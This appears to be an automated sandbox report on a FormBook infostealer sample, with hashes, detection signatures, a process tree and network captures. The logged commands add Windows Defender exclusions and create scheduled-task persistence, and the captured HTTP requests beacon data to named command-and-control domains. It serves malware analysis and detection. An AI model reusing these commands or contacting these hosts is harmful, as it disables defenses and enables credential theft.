Edit tour

Windows Analysis Report
FGGx944Qu7.exe

Overview

General Information

Sample name:	FGGx944Qu7.exe renamed because original name is a hash value
Original sample name:	21d18e20b8b0e17e0b554b5940a7aaed.exe
Analysis ID:	1443953
MD5:	21d18e20b8b0e17e0b554b5940a7aaed
SHA1:	bad65794a2bc8c23d373f82e11978f11af1af57d
SHA256:	b600c43e2980691952532a79e7a0aef2351aeef6f740fd2f56647509c93b6da0
Tags:	32exetrojan
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

FGGx944Qu7.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\FGGx944Qu7.exe" MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

powershell.exe (PID: 7344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7400 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7716 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7424 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FGGx944Qu7.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\FGGx944Qu7.exe" MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

FGGx944Qu7.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\FGGx944Qu7.exe" MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

usFxdnRPYjnb.exe (PID: 4460 cmdline: "C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

SearchProtocolHost.exe (PID: 8040 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)

usFxdnRPYjnb.exe (PID: 2492 cmdline: "C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

TBsjWljiCpR.exe (PID: 7680 cmdline: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

schtasks.exe (PID: 7864 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TBsjWljiCpR.exe (PID: 7908 cmdline: "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe" MD5: 21D18E20B8B0E17E0B554B5940A7AAED)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a530:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a530:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a530:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2da33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a530:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x511e5b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4fb49a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x511e5b:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4fb49a:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: FGGx944Qu7.exe PID: 7252	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TBsjWljiCpR.exe PID: 7680	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.FGGx944Qu7.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.FGGx944Qu7.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2da33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
8.2.FGGx944Qu7.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
8.2.FGGx944Qu7.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cc33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FGGx944Qu7.exe", ParentImage: C:\Users\user\Desktop\FGGx944Qu7.exe, ParentProcessId: 7252, ParentProcessName: FGGx944Qu7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", ProcessId: 7344, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe, ParentImage: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe, ParentProcessId: 7680, ParentProcessName: TBsjWljiCpR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp", ProcessId: 7864, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FGGx944Qu7.exe", ParentImage: C:\Users\user\Desktop\FGGx944Qu7.exe, ParentProcessId: 7252, ParentProcessName: FGGx944Qu7.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", ProcessId: 7424, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FGGx944Qu7.exe", ParentImage: C:\Users\user\Desktop\FGGx944Qu7.exe, ParentProcessId: 7252, ParentProcessName: FGGx944Qu7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe", ProcessId: 7344, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FGGx944Qu7.exe", ParentImage: C:\Users\user\Desktop\FGGx944Qu7.exe, ParentProcessId: 7252, ParentProcessName: FGGx944Qu7.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp", ProcessId: 7424, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FGGx944Qu7.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.drapples.club/q0r6/	Avira URL Cloud: Label: phishing
Source: http://www.drapples.club	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Avira: detection malicious, Label: HEUR/AGEN.1304432

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Virustotal: Detection: 67%			Perma Link

Multi AV Scanner detection for submitted file

Source: FGGx944Qu7.exe	ReversingLabs: Detection: 62%
Source: FGGx944Qu7.exe	Virustotal: Detection: 67%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FGGx944Qu7.exe

Joe Sandbox ML: detected

Source: FGGx944Qu7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FGGx944Qu7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: usFxdnRPYjnb.exe, 0000000F.00000000.1869462009.0000000000FAE000.00000002.00000001.01000000.0000000A.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032183269.0000000000FAE000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wntdll.pdbUGP source: FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1947640704.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.000000000342E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1945593903.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FGGx944Qu7.exe, FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1947640704.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.000000000342E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1945593903.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: SearchProtocolHost.pdbUGP source: usFxdnRPYjnb.exe, 0000000F.00000003.1884595652.0000000000C8B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: SearchProtocolHost.pdb source: usFxdnRPYjnb.exe, 0000000F.00000003.1884595652.0000000000C8B000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Code function: 4x nop then jmp 0FB01D2Dh

Source: Joe Sandbox View	IP Address: 34.149.87.45 34.149.87.45
Source: Joe Sandbox View	IP Address: 199.59.243.225 199.59.243.225

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /q0r6/?uZgP=5pyvScKx6ZbOO2uX774/2f03V4PpvoLdLg/OCd1FMvXsxJY7YeHi6SxOzHnr25kvmJZHa8XXHydHc3e54xwdxF+eQrhYMnjeuarocBe7v18XiUqzaWXVlPw=&a6m=8Rw4HDhPzbgPS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.oobzxod2xn.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0

Source: global traffic	DNS traffic detected: DNS query: www.birthingwitht.com
Source: global traffic	DNS traffic detected: DNS query: www.oobzxod2xn.cc
Source: global traffic	DNS traffic detected: DNS query: www.drapples.club

Source: unknown

HTTP traffic detected: POST /q0r6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.drapples.clubOrigin: http://www.drapples.clubReferer: http://www.drapples.club/q0r6/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 201Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Data Raw: 75 5a 67 50 3d 36 54 37 73 6c 75 67 4c 55 76 59 57 51 53 5a 7a 65 38 54 44 57 75 2f 74 6a 45 67 77 77 4a 67 6d 63 67 50 70 30 4c 47 57 51 37 58 70 48 6e 51 4f 51 6b 50 50 47 37 69 57 30 6c 57 31 6d 4c 2f 41 6a 78 5a 52 4c 4e 57 58 69 6d 68 44 73 45 73 75 39 70 7a 68 42 4a 71 67 48 48 70 55 2b 37 66 71 6d 42 75 44 33 75 4b 68 66 32 32 71 4e 6f 46 62 6a 32 72 39 4d 78 43 68 6e 50 77 57 65 30 47 64 76 37 4f 75 69 65 65 4e 74 43 4c 48 71 59 71 4e 41 70 50 4a 48 2f 77 77 68 4c 45 75 64 4d 76 6b 36 52 30 39 7a 69 4e 55 67 56 4e 69 70 39 65 75 51 48 37 67 6a 44 44 43 6b 50 38 68 2b 2b 38 74 4f 51 3d 3d Data Ascii: uZgP=6T7slugLUvYWQSZze8TDWu/tjEgwwJgmcgPp0LGWQ7XpHnQOQkPPG7iW0lW1mL/AjxZRLNWXimhDsEsu9pzhBJqgHHpU+7fqmBuD3uKhf22qNoFbj2r9MxChnPwWe0Gdv7OuieeNtCLHqYqNApPJH/wwhLEudMvk6R09ziNUgVNip9euQH7gjDDCkP8h++8tOQ==

Source: FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: FGGx944Qu7.exe, 00000000.00000002.1688859188.000000000326F000.00000004.00000800.00020000.00000000.sdmp, TBsjWljiCpR.exe, 00000009.00000002.1885020055.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: usFxdnRPYjnb.exe, 00000013.00000002.2865529929.0000000005731000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.drapples.club
Source: usFxdnRPYjnb.exe, 00000013.00000002.2865529929.0000000005731000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.drapples.club/q0r6/
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: SearchProtocolHost.exe, 00000010.00000003.2407310334.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
